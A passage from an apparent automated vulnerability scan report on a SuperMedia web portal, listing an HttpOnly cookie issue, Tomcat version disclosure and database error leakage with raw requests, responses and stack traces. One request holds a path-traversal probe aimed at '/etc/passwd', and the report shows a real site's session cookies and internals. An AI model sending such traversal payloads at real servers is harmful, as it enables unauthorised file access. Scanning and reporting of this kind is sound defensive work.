Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:42 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Cache-Control: private
Content-Encoding:
Content-Length: 1642


<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>org.apache.jasper.JasperException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:460) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:373) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>root cause</b> <pre>org.springframework.beans.NullValueInNestedPathException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.springframework.beans.BeanWrapperImpl.getNestedBeanWrapper(BeanWrapperImpl.java:443) org.springframework.beans.BeanWrapperImpl.getBeanWrapperForPropertyPath(BeanWrapperImpl.java:418) org.springframework.beans.BeanWrapperImpl.getPropertyValue(BeanWrapperImpl.java:524) org.springframework.validation.AbstractPropertyBindingResult.getActualFieldValue(AbstractPropertyBindingResult.java:77) org.springframework.validation.AbstractBindingResult.getFieldValue(AbstractBindingResult.java:337) org.springframework.validation.BindException.getFieldValue(BindException.java:206) org.springframework.web.servlet.support.BindStatus.&lt;init&gt;(BindStatus.java:117) org.springframework.web.servlet.tags.BindTag.doStartTagInternal(BindTag.java:116) org.springframework.web.servlet.tags.RequestContextAwareTag.doStartTag(RequestContextAwareTag.java:77) org.apache.jsp.jsp.accountsetup_jsp._jspService(accountsetup_jsp.java:565) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:98) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:331) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.25 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do CONFIRMED

http://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow

Identified Cookie

JSESSIONID

Request

GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Sat, 19 Mar 2011 11:57:02 GMT
Set-Cookie: JSESSIONID=D61798579F75CB8CC29455B745D6534F.app8-a1; Path=/,NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/;httponly
Location: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
Content-Length: 0
Connection: close


Tomcat Version Disclosure

Tomcat Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is Tomcat. This information was gathered from the HTTP Headers.

Impact

An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DC..

Extracted Version

Apache Tomcat/5.5.25

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_cD8CD9E7F-2CE0-BAC0-8E3D-C3DCB27FFA09_kBF1EB9ED-E594-C86C-D15F-96C1705501CF HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=&password=&&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:42 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Cache-Control: private
Content-Encoding:
Content-Length: 1642


<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>org.apache.jasper.JasperException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:460) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:373) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>root cause</b> <pre>org.springframework.beans.NullValueInNestedPathException: Invalid property 'customerProfile' of bean class [com.idearc.ssa.web.spring.AccountSetupFormWrapper]: Value of nested property 'customerProfile' is null org.springframework.beans.BeanWrapperImpl.getNestedBeanWrapper(BeanWrapperImpl.java:443) org.springframework.beans.BeanWrapperImpl.getBeanWrapperForPropertyPath(BeanWrapperImpl.java:418) org.springframework.beans.BeanWrapperImpl.getPropertyValue(BeanWrapperImpl.java:524) org.springframework.validation.AbstractPropertyBindingResult.getActualFieldValue(AbstractPropertyBindingResult.java:77) org.springframework.validation.AbstractBindingResult.getFieldValue(AbstractBindingResult.java:337) org.springframework.validation.BindException.getFieldValue(BindException.java:206) org.springframework.web.servlet.support.BindStatus.&lt;init&gt;(BindStatus.java:117) org.springframework.web.servlet.tags.BindTag.doStartTagInternal(BindTag.java:116) org.springframework.web.servlet.tags.RequestContextAwareTag.doStartTag(RequestContextAwareTag.java:77) org.apache.jsp.jsp.accountsetup_jsp._jspService(accountsetup_jsp.java:565) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:98) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:331) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:329) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:265) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.springframework.web.servlet.view.InternalResourceView.renderMergedOutputModel(InternalResourceView.java:142) org.springframework.web.servlet.view.AbstractView.render(AbstractView.java:243) org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1141) org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:878) org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:792) org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:475) org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:430) javax.servlet.http.HttpServlet.service(HttpServlet.java:690) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.idearc.ssa.web.filter.SessionManager.doFilter(SessionManager.java:117) com.idearc.ssa.web.filter.CharsetFilter.doFilter(CharsetFilter.java:33) org.acegisecurity.securechannel.ChannelProcessingFilter.doFilter(ChannelProcessingFilter.java:138) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:264) org.acegisecurity.intercept.web.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:107) org.acegisecurity.intercept.web.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:72) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:110) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.providers.anonymous.AnonymousProcessingFilter.doFilter(AnonymousProcessingFilter.java:125) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.wrapper.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:81) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.AbstractProcessingFilter.doFilter(AbstractProcessingFilter.java:217) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.ui.logout.LogoutFilter.doFilter(LogoutFilter.java:106) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.context.HttpSessionContextIntegrationFilter.doFilter(HttpSessionContextIntegrationFilter.java:229) org.acegisecurity.util.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:274) org.acegisecurity.util.FilterChainProxy.doFilter(FilterChainProxy.java:148) org.acegisecurity.util.FilterToBeanProxy.doFilter(FilterToBeanProxy.java:98) com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119) com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55) com.idearc.ssa.web.omniture.OmnitureFilter.doFilter(OmnitureFilter.java:46)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.25 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowId=../../../../../CANTBEHERE/../../../../....

Parameters

Parameter Type Value
_flowId GET ../../../../../CANTBEHERE/../../../../../../etc/passwd

Request

GET /spportal/spportalFlow.do?_flowId=../../../../../CANTBEHERE/../../../../../../etc/passwd HTTP/1.1
Referer: https://www.supermedia.com/spportal/forgotPwd.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:43 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6548






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/indexLogin.do";s.pageName="";s.prop1="Account Setup Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@3ccdf84f targetAction = com.idearc.ssa.web.spring.LoginActAction@e0d3cc7, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
